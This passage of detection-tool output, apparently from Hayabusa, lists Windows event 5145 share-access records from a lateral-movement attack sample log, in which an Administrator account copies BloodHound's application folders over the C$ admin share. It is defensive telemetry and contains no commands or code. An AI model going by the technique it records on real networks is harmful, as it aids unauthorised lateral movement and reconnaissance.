IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 